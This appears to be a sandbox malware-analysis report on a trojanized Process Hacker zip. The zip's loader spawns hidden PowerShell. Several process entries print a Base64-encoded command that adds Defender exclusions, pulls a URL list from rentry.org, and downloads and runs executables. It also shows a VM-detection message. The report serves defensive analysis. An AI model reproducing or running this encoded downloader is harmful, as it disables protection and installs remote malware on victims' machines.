File name:

processhacker-2.39-bin.zip

Full analysis: https://app.any.run/tasks/a3da6178-6904-4714-965b-86ae5da6752d
Verdict: Malicious activity
Analysis date: April 26, 2023, 14:06:29
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

FD49F08CC1529DEB3F405B54B6E4739B

SHA1:

76D464D78800F38C503E19221418F34678B6DF61

SHA256:

FED68040591B2EA4D7F18276CD8B7A20A98CC10AA1740697A0D1F6BF6D237358

SSDEEP:

98304:tDqt5TrOmlLB/7rTOqcXfOzJR1qioDLK2EbhU:dsTrHlB73OqX4ioDfshU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • The process creates files with name similar to system file names

      • WinRAR.exe (PID: 976)

    • Drops a system driver (possible attempt to evade defenses)

      • WinRAR.exe (PID: 976)

    • Reads the Internet Settings

      • OzilLoader.exe (PID: 3332)
      • OzilLoader.exe (PID: 3924)
      • powershell.exe (PID: 1944)
      • ProcessHacker.exe (PID: 2768)
      • OzilLoader.exe (PID: 3796)
      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 3700)

    • Starts POWERSHELL.EXE for commands execution

      • OzilLoader.exe (PID: 3332)
      • powershell.exe (PID: 3700)
      • OzilLoader.exe (PID: 3924)
      • powershell.exe (PID: 1944)
      • OzilLoader.exe (PID: 3796)
      • powershell.exe (PID: 1808)

    • BASE64 encoded PowerShell command has been detected

      • OzilLoader.exe (PID: 3332)
      • OzilLoader.exe (PID: 3924)
      • OzilLoader.exe (PID: 3796)

    • Base64-obfuscated command line is found

      • OzilLoader.exe (PID: 3332)
      • OzilLoader.exe (PID: 3924)
      • OzilLoader.exe (PID: 3796)

    • Application launched itself

      • powershell.exe (PID: 3700)
      • powershell.exe (PID: 1944)
      • powershell.exe (PID: 1808)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 3700)
      • powershell.exe (PID: 1944)
      • powershell.exe (PID: 1808)

    • Unusual connection from system programs

      • powershell.exe (PID: 3700)
      • powershell.exe (PID: 1944)
      • powershell.exe (PID: 1808)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1944)
      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 3700)

    • Reads settings of System Certificates

      • ProcessHacker.exe (PID: 2768)

    • Checks Windows Trust Settings

      • ProcessHacker.exe (PID: 2768)

    • Reads security settings of Internet Explorer

      • ProcessHacker.exe (PID: 2768)

  • INFO

    • Manual execution by a user

      • OzilLoader.exe (PID: 3332)
      • explorer.exe (PID: 4064)
      • OzilLoader.exe (PID: 2636)
      • OzilLoader.exe (PID: 3924)
      • ProcessHacker.exe (PID: 2768)
      • OzilLoader.exe (PID: 3796)

    • The process checks LSA protection

      • explorer.exe (PID: 4064)
      • OzilLoader.exe (PID: 3332)
      • OzilLoader.exe (PID: 3924)
      • ProcessHacker.exe (PID: 2768)
      • OzilLoader.exe (PID: 3796)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 976)

    • Checks supported languages

      • OzilLoader.exe (PID: 3332)
      • OzilLoader.exe (PID: 3924)
      • ProcessHacker.exe (PID: 2768)
      • OzilLoader.exe (PID: 3796)

    • Reads the computer name

      • OzilLoader.exe (PID: 3332)
      • OzilLoader.exe (PID: 3924)
      • ProcessHacker.exe (PID: 2768)
      • OzilLoader.exe (PID: 3796)

    • Create files in a temporary directory

      • powershell.exe (PID: 3700)
      • powershell.exe (PID: 1944)
      • powershell.exe (PID: 2964)
      • powershell.exe (PID: 1808)
      • powershell.exe (PID: 2460)
      • powershell.exe (PID: 1416)

    • Reads the time zone

      • ProcessHacker.exe (PID: 2768)

    • Reads CPU info

      • ProcessHacker.exe (PID: 2768)

    • Reads Environment values

      • ProcessHacker.exe (PID: 2768)

    • Reads the machine GUID from the registry

      • ProcessHacker.exe (PID: 2768)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: CHANGELOG.txt
ZipUncompressedSize: 25995
ZipCompressedSize: 7294
ZipCRC: 0x34beb5ab
ZipModifyDate: 2016:03:29 12:18:08
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
68
Monitored processes
13
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe explorer.exe no specs ozilloader.exe no specs ozilloader.exe powershell.exe powershell.exe no specs ozilloader.exe powershell.exe powershell.exe no specs processhacker.exe ozilloader.exe powershell.exe powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
976"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\processhacker-2.39-bin.zip"C:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
1416"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#bzm#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#hat#>; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
1808"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdAB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAegBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAYQB0ACMAPgA7ACIAOwA8ACMAcgB4AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAGwAbgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBoAGYAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGcAdwAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AYwB0AGEAdwBkAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBwAHUAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AcABqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAYwBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAdgBiACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbQB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACAAPAAjAG4AagB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB2AHYAZwAjAD4A"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
OzilLoader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1944"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdAB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAegBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAYQB0ACMAPgA7ACIAOwA8ACMAcgB4AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAGwAbgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBoAGYAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGcAdwAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AYwB0AGEAdwBkAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBwAHUAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AcABqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAYwBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAdgBiACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbQB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACAAPAAjAG4AagB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB2AHYAZwAjAD4A"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
OzilLoader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2460"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#bzm#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#hat#>; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
2636"C:\Users\admin\Downloads\OzilLoader.exe" C:\Users\admin\Downloads\OzilLoader.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\downloads\ozilloader.exe
c:\windows\system32\ntdll.dll
2768"C:\Users\admin\Downloads\x86\ProcessHacker.exe" C:\Users\admin\Downloads\x86\ProcessHacker.exe
explorer.exe
User:
admin
Company:
wj32
Integrity Level:
HIGH
Description:
Process Hacker
Exit code:
0
Version:
2.39.0.124
Modules
Images
c:\users\admin\downloads\x86\processhacker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\winsta.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\user32.dll
2964"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#bzm#>[System.Windows.Forms.MessageBox]::Show('No VM/VPS allowed!','','OK','Error')<#hat#>; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\gdi32.dll
3332"C:\Users\admin\Downloads\OzilLoader.exe" C:\Users\admin\Downloads\OzilLoader.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\downloads\ozilloader.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3700"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdAB4ACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGIAegBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAVgBNAC8AVgBQAFMAIABhAGwAbABvAHcAZQBkACEAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGgAYQB0ACMAPgA7ACIAOwA8ACMAcgB4AHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAGwAbgAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBoAGYAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBqAGcAdwAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AYwB0AGEAdwBkAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBwAHUAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG4AcABqACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUAIAA8ACMAYwBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAHEAdgBiACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbQB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACAAPAAjAG4AagB5ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB2AHYAZwAjAD4A"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
OzilLoader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
Total events
53 152
Read events
52 912
Write events
240
Delete events
0

Modification events

(PID) Process:(976) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\16D\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip
(PID) Process:(976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(976) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(3332) OzilLoader.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3332) OzilLoader.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
62
Suspicious files
28
Text files
8
Unknown types
2

Dropped files

PID
Process
Filename
Type
976WinRAR.exeC:\Users\admin\Downloads\README.txttext
MD5:72AC5A8DD6491E525B9783C9BC439FE6
SHA256:0C4F051675A690EA4DB6AB2EB81FDCED6990E2538AD21DC4610AA5925253A090
976WinRAR.exeC:\Users\admin\Downloads\LICENSE.txttext
MD5:EB59E0A5D01D0A5B02DA0C9E7786969F
SHA256:C38E811F6F83428921D0CECD998A44B717149B577B4C1A63B66064F03C34E4E7
976WinRAR.exeC:\Users\admin\Downloads\x64\plugins\ExtendedNotifications.dllexecutable
MD5:BE4DC4D2D1D05001AB0BB2BB8659BFAD
SHA256:61E8CD8DE80A5C0D7CED280FE04AD8387A846A7BF2EE51BCBBA96B971C7C1795
976WinRAR.exeC:\Users\admin\Downloads\x64\plugins\Updater.dllexecutable
MD5:6976B57C6391F54DBD2828A45CA81100
SHA256:0C11CDC3765FFB53BA9707B6F99EC17AE4F7334578A935BA7BCBBC9C7BDEED2E
976WinRAR.exeC:\Users\admin\Downloads\x64\plugins\NetworkTools.dllexecutable
MD5:D6BED1D6FDBED480E32FDD2DD4C13352
SHA256:476AA6AF14DD0B268786E32543B9A6917A298D4D90E1015DAC6FB2B522CF5D2E
976WinRAR.exeC:\Users\admin\Downloads\CHANGELOG.txttext
MD5:B13DE4E8531AF294F87FFDDCCB08D7CE
SHA256:69E38F590A9A25F656E7507AF76229A3A6678A8C57B4E879FF8CE7E52FD704FF
976WinRAR.exeC:\Users\admin\Downloads\x64\plugins\WindowExplorer.dllexecutable
MD5:0E8D04159C075F0048B89270D22D2DBB
SHA256:282696487EA5DC781788D5D8477B977F72B7C70F201C2AF0CFE7E1A9FD8D749A
976WinRAR.exeC:\Users\admin\Downloads\x64\plugins\UserNotes.dllexecutable
MD5:E48C789C425F966F5E5EE3187934174F
SHA256:FC9D0D0482C63AB7F238BC157C3C0FED97951CCF2D2E45BE45C06C426C72CB52
976WinRAR.exeC:\Users\admin\Downloads\x64\ProcessHacker.exeexecutable
MD5:B365AF317AE730A67C936F21432B9C71
SHA256:BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4
976WinRAR.exeC:\Users\admin\Downloads\x64\kprocesshacker.sysexecutable
MD5:1B5C3C458E31BEDE55145D0644E88D75
SHA256:70211A3F90376BBC61F49C22A63075D1D4DDD53F0AEFA976216C46E6BA39A9F4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
8
DNS requests
4
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2768
ProcessHacker.exe
GET
301
104.18.11.128:80
http://processhacker.sourceforge.net/update.php
US
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3700
powershell.exe
198.251.88.130:443
rentry.org
PONYNET
LU
suspicious
1944
powershell.exe
198.251.88.130:443
rentry.org
PONYNET
LU
suspicious
1808
powershell.exe
198.251.88.130:443
rentry.org
PONYNET
LU
suspicious
2768
ProcessHacker.exe
104.18.10.128:443
processhacker.sourceforge.net
